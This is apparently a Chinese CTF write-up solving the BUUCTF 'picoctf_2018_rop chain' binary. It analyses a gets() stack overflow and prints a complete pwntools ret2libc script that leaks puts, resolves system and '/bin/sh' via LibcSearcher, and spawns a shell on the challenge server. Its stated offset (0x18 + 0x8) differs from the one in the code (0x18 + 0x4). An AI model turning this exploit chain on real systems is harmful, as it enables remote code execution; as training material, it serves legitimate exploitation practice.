buuctf中的picoctf_2018_rop chain

首先checksec检查保护机制：

-32位程序

-开启了栈不可执行机制

然后使用反汇编工具IDA进行分析：

看到了vuln函数和左边的win1，win2函数及flag函数，第一眼看到就觉得能够从这些函数中获取flag，但实际行不行呢，先一个一个点进去看一下

vuln函数内部：

gets函数可触发栈溢出漏洞，顺便算出偏移为：0x18 + 0x8

win1函数内部;

使变量win1的值为1

win2函数内部：

一些if-else的条件选择语句

最后是flag函数内部：

可以发现要想从这里拿到flag，必须要让win1，win2和a1的值都等于-559039827，但是前面的那几个函数都无法实现，所以这几个函数一点作用也没有，纯糊弄人呢

由于在程序的反汇编代码中没有任何后门函数和system函数地址，题目也没给libc库文件，这里考虑泄露出某个函数的真实的地址再借助LibcSearcher这个插件找到libc库，再计算出libc基址，进而计算出system函数及/bin/sh的地址

先在IDA中拿到vuln函数的地址，方便后面二次使用栈溢出漏洞：0x8048714

然后就可以开始编写exp攻击脚本了：

第一次栈溢出先构造ROP链执行puts函数打印出puts函数的真实地址，拿到后通过LibcSearcher找到libc库，然后计算出libc基址后再计算出system函数和/bin/sh地址，第二次栈溢出执行system函数后就能拿到shell

from pwn import * from LibcSearcher import LibcSearcher context(arch='i386', os='linux', log_level='debug') #io = process('./pwn') # 在本地运行程序。 # gdb.attach(io) # 启动 GDB io = connect('node5.buuoj.cn',29484) # 与在线环境交互。 offset = 0x18 + 0x4 vuln_addr = 0x8048714 elf = ELF("./pwn") puts_got = elf.got['puts'] puts_plt = elf.plt['puts'] io.recvuntil(b'Enter your input> ') payload = b'a'*offset + p32(puts_plt) + p32(vuln_addr) + p32(puts_got) io.sendline(payload) puts_addr = u32(io.recv(4)) print(hex(puts_addr)) libc = LibcSearcher("puts",puts_addr) libc_base = puts_addr - libc.dump("puts") system_addr = libc_base + libc.dump("system") bin_sh_addr = libc_base + libc.dump("str_bin_sh") io.recvuntil(b'Enter your input> ') payload = b'a'*offset + p32(system_addr) + p32(1) + p32(bin_sh_addr) io.sendline(payload) io.interactive()

这是运行结果：

这里要手动选择libc库，32位程序就选择32位的libc库就行，可能会选到不适配得到libc库，多试几个就行了